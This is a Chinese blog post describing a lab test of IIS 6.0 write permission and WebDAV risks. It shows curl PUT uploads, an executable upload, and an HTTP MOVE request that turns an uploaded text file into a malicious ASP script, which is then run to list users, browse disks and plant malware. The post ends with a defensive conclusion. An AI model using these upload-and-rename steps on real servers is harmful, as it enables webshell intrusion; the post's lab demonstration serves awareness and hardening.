天天看点

IIS写入权限隐患

测试环境:

一台已经安装好了windows server 2003并且开通了开通了IIS的虚拟机和一台XP客户机。

说明:服务器仅仅安装IIS组件,当前未配置站点,所有分区均采用默认的NTFS安全设置。

服务器 客户端
Name: WWW1 Name: Test1
OS: Windows Server 2003 OS: Windows XP Pro
Software: IIS 6.0+dotnet 2.0 with sp2

Software: Curl for windows (c:\curl)

        Iiswrite(c:\iiswrite)

IP: 192.168.1.11 IP: 192.168.1.101
步骤:

1.       在WWW1的D盘新建一个webdata文件夹,用来放置站点文件,在webdata下新建一个test文件夹,用来放置测试站点“test.com”文件,在test下新建一个default.htm的文件作为测试页,内容为hello。

2.       打开WWW1 IIS管理工具,右击默认站点,删除之,再删除默认应用程序池。然后新建一个应用程序池test,接着新建一个网站test.com,路径设定为d:\webdata\test,其他均采用默认设置,将test.com应用池设定为test,使用纯脚本。

3.在客户机Test1上更改hosts文件,添加一行“192.168.1.11    test.com”,在IE中输入http://test.com,可以看到www1的主页。

4.在客户端Test1上,打开命令提示符,进入curl目录,测试上传一个文件(d:\test.txt)。

注意:此时服务器未打开“写入”权限

C:\curl>curl -T d:\test.txt http://test.com/ -v                  (-T=transfer,-v=view)

* About to connect() to test.com port 80 (#0)

*   Trying 192.168.1.11... connected

* Connected to test.com (192.168.1.11) port 80 (#0)

> PUT /test%2Etxt HTTP/1.1

> User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zl

ib/1.2.3

> Host: test.com

> Accept: */*

> Content-Length: 48

> Expect: 100-continue

< HTTP/1.1 501 Not Implemented         (说明不可以put文件)

< Content-Length: 0

< Server: Microsoft-IIS/6.0

< X-Powered-By: ASP.NET

< Date: Tue, 21 Dec 2010 03:46:32 GMT

* Connection #0 to host test.com left intact

* Closing connection #0

5.在WWW1上打开“写入”权限。

6.在Test1上重复上次的curl上传文件命令。

注:此时已经打开了“写入”权限

C:\curl>curl -T d:\test.txt http://test.com/ -v

< HTTP/1.1 501 Not Implemented         (此时仍然不能put文件,why?请接着往下看)

< Date: Tue, 21 Dec 2010 03:53:00 GMT

7. 在WWW1上的web扩展服务中将webdav设置为“允许”。

8. 再回到TEST1上重复curl上传文件命令。

注意:此时打开了“写入”权限并同时开启了webdav。

< HTTP/1.1 100 Continue

< HTTP/1.1 201 Created                       (说明文件已经put成功)

< Date: Tue, 21 Dec 2010 03:56:52 GMT

< Location: http://test.com/test.txt                 (也可以通过这个URL查看上传的文件)

< Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH

, SEARCH, LOCK, UNLOCK

9. 接着在TEST1上测试上传exe文件(或者木马程序)。

C:\curl>curl -T d:\test.exe http://test.com/ -v

> PUT /test%2Eexe HTTP/1.1

> Content-Length: 0

< HTTP/1.1 201 Created                 (exe,vbs之类的可执行文件皆可,asp除外)

< Date: Tue, 21 Dec 2010 04:01:51 GMT

< Location: http://test.com/test.exe

< Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, PROPFIND, PRO

PPATCH, SEARCH, LOCK, UNLOCK

到这一步已经能起到一定的破坏作用了。但是如果再“不小心”连“脚本资源访问”的勾都勾上的话,那就是非常危险了。

10. 在WWW1上开启“脚本资源访问”。

注:勾上此项之后可以执行asp等脚本程序。但是并不意味着可以直接上传asp文件。

11. 因为不可以直接上传asp文件,所以只能先put一个txt,再用move的方法将这个txt改为asp文件。

从网上google一段带有恶意代码的asp源代码,在Test1机器上新建一个test.txt的文本文件,将准备好的代码粘贴进去,打开c:\iiswrite.exe程序(这个程序自带很多HTTP/1.1的操作)。我选择的是put的操作,选择test.txt文件,然后点击“提交数据包”。如图

IIS写入权限隐患

在上面输出中可以看到put成功(201 created)。

接下来move这个文件后缀。

下面是move的语句,有些值是可以在黑窗口中更改的(红色注释)

MOVE /test.txt HTTP/1.1                (已put的文件名)

Host: test.com                        (目标域名)

Destination: http://test.com/test.asp        (修改后的文件名)

IIS写入权限隐患

(201 created)——令人期待的结果。

13. 在TEST1客户机上用IE打开这个asp文件,http://test.com/test.asp

下面的画面就是那段恶意代码的效果,请慢慢欣赏。

IIS写入权限隐患

查看系统用户清单

挂马

浏览硬盘文件

结论:开启webdav和“写入”权限后将会对站点以及服务器引起严重的安全隐患,而这些都是可以人为避免的,正所谓千里之堤毁于蚁穴。如果再不小心勾上“脚本资源访问”让非法用户put asp脚本文件并且执行的话,后果真是不堪设想。

应博友要求,下面是本文完整版的PDF文档,方便大家下载。

http://down.51cto.com/data/154237

继续阅读